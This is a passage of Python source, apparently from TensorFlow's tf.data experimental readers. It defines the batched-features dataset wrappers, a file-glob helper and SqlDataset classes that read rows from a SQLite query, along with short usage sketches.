if dataset_ops.get_legacy_output_types(dataset) == (
dtypes.string, dtypes.string):
dataset = dataset_ops.MapDataset(
dataset, lambda _, v: v, use_inter_op_parallelism=False)
# Apply dataset repeat and shuffle transformations.
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# NOTE(mrry): We set `drop_remainder=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
dataset = dataset.batch(
batch_size, drop_remainder=drop_final_batch or num_epochs is None)
# Parse `Example` tensors to a dictionary of `Feature` tensors.
dataset = dataset.apply(
parsing_ops.parse_example_dataset(
features, num_parallel_calls=parser_num_threads))
if label_key:
if label_key not in features:
raise ValueError(
"The `label_key` provided (%r) must be one of the `features` keys." %
label_key)
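    # Split the label out of each parsed feature dict so that elements become
    # (features, label) tuples.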
dataset = dataset.map(lambda x: (x, x.pop(label_key)))
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
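# A hypothetical end-to-end sketch of the function above. The file pattern,
# feature spec, and "label" key are illustrative assumptions; the feature-spec
# classes are pulled in with a local import so the sketch stays self-contained.
def _batched_features_usage_sketch():  # pragma: no cover - documentation sketch only
  from tensorflow.python.ops import parsing_ops as feature_specs
  features = {
      "age": feature_specs.FixedLenFeature([], dtypes.int64, default_value=-1),
      "gender": feature_specs.FixedLenFeature([], dtypes.string,
                                              default_value=""),
      "label": feature_specs.FixedLenFeature([], dtypes.int64, default_value=0),
  }
  return make_batched_features_dataset_v2(
      file_pattern="/tmp/train-*.tfrecord",
      batch_size=32,
      features=features,
      label_key="label",
      num_epochs=1,
      shuffle_buffer_size=1000)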
@tf_export(v1=["data.experimental.make_batched_features_dataset"])
def make_batched_features_dataset_v1(file_pattern, # pylint: disable=missing-docstring
batch_size,
features,
reader=core_readers.TFRecordDataset,
label_key=None,
reader_args=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
reader_num_threads=1,
parser_num_threads=2,
sloppy_ordering=False,
drop_final_batch=False):
return dataset_ops.DatasetV1Adapter(make_batched_features_dataset_v2(
file_pattern, batch_size, features, reader, label_key, reader_args,
num_epochs, shuffle, shuffle_buffer_size, shuffle_seed,
prefetch_buffer_size, reader_num_threads, parser_num_threads,
sloppy_ordering, drop_final_batch))
make_batched_features_dataset_v1.__doc__ = (
    make_batched_features_dataset_v2.__doc__)
def _get_file_names(file_pattern, shuffle):
"""Parse list of file names from pattern, optionally shuffled.
Args:
file_pattern: File glob pattern, or list of glob patterns.
shuffle: Whether to shuffle the order of file names.
Returns:
List of file names matching `file_pattern`.
Raises:
ValueError: If `file_pattern` is empty, or pattern matches no files.
"""
if isinstance(file_pattern, list):
if not file_pattern:
raise ValueError("File pattern is empty.")
file_names = []
for entry in file_pattern:
file_names.extend(gfile.Glob(entry))
else:
file_names = list(gfile.Glob(file_pattern))
if not file_names:
raise ValueError("No files match %s." % file_pattern)
# Sort files so it will be deterministic for unit tests.
if not shuffle:
file_names = sorted(file_names)
return file_names
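# A tiny, hypothetical sketch of the helper above: both a single glob string and
# a list of glob strings are accepted, and with shuffle=False the matching file
# names come back sorted.
def _get_file_names_usage_sketch():  # pragma: no cover - documentation sketch only
  return _get_file_names(["/tmp/data/*.csv", "/tmp/data/*.tsv"], shuffle=False)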
@tf_export("data.experimental.SqlDataset", v1=[])
class SqlDatasetV2(dataset_ops.DatasetSource):
"""A `Dataset` consisting of the results from a SQL query."""
def __init__(self, driver_name, data_source_name, query, output_types):
"""Creates a `SqlDataset`.
`SqlDataset` allows a user to read data from the result set of a SQL query.
For example:
```python
tf.compat.v1.enable_eager_execution()
dataset = tf.data.experimental.SqlDataset("sqlite", "/foo/bar.sqlite3",
"SELECT name, age FROM people",
(tf.string, tf.int32))
# Prints the rows of the result set of the above query.
for element in dataset:
print(element)
```
Args:
driver_name: A 0-D `tf.string` tensor containing the database type.
Currently, the only supported value is 'sqlite'.
data_source_name: A 0-D `tf.string` tensor containing a connection string
to connect to the database.
query: A 0-D `tf.string` tensor containing the SQL query to execute.
output_types: A tuple of `tf.DType` objects representing the types of the
columns returned by `query`.
"""
self._driver_name = ops.convert_to_tensor(
driver_name, dtype=dtypes.string, name="driver_name")
self._data_source_name = ops.convert_to_tensor(
data_source_name, dtype=dtypes.string, name="data_source_name")
self._query = ops.convert_to_tensor(
query, dtype=dtypes.string, name="query")
self._structure = structure.NestedStructure(
nest.map_structure(
lambda dtype: structure.TensorStructure(dtype, []), output_types))
variant_tensor = gen_experimental_dataset_ops.experimental_sql_dataset(
self._driver_name, self._data_source_name, self._query,
**dataset_ops.flat_structure(self))
super(SqlDatasetV2, self).__init__(variant_tensor)
@property
def _element_structure(self):
return self._structure
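# A hypothetical usage sketch of the class above; the database path, table, and
# column names are illustrative assumptions. `output_types` must match the
# number and types of the columns produced by the query.
def _sql_dataset_usage_sketch():  # pragma: no cover - documentation sketch only
  return SqlDatasetV2(
      driver_name="sqlite",
      data_source_name="/tmp/example.sqlite3",
      query="SELECT name, age FROM people",
      output_types=(dtypes.string, dtypes.int32))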
@tf_export(v1=["data.experimental.SqlDataset"])
class SqlDatasetV1(dataset_ops.DatasetV1Adapter):
"""A `Dataset` consisting of the results from a SQL query."""
@functools.wraps(SqlDatasetV2.__init__)
def __init__(self, driver_name, data_source_name, query, output_types):
wrapped = SqlDatasetV2(driver_name, data_source_name, query, output_types)
super(SqlDatasetV1, self).__init__(wrapped)
# TODO(b/119044825): Until all `tf.data` unit tests are converted to V2, keep
# these aliases in place.
CsvDataset = CsvDatasetV1
SqlDataset = SqlDatasetV1
make_batched_features_dataset = make_batched_features_dataset_v1
make_csv_dataset = make_csv_dataset_v1